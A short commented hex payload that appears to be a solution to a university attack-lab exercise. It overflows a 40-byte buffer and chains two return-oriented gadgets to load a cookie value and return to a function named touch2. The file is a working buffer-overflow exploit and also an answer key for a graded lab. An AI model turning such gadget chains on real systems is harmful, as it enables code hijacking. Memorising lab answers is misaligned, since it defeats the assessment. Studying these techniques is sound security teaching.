/* Overwriting the buffer named buf. We could use any other byte encoding. */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

/* Overwriting the return address to test with a return address to a gadget (0x4019ab).
   The gadget is: popq %rax | nop | ret */
ab 19 40 00 00 00 00 00

/* Storing the cookie on the stack */
fa 97 b9 59 00 00 00 00

/* Storing the return address to another gadget (0x4019a2).
   The gadget is: movq %rax,%rdi | ret */
a2 19 40 00 00 00 00 00

/* Storing the return address to touch2 (0x4017ec). */
ec 17 40 00 00 00 00 00
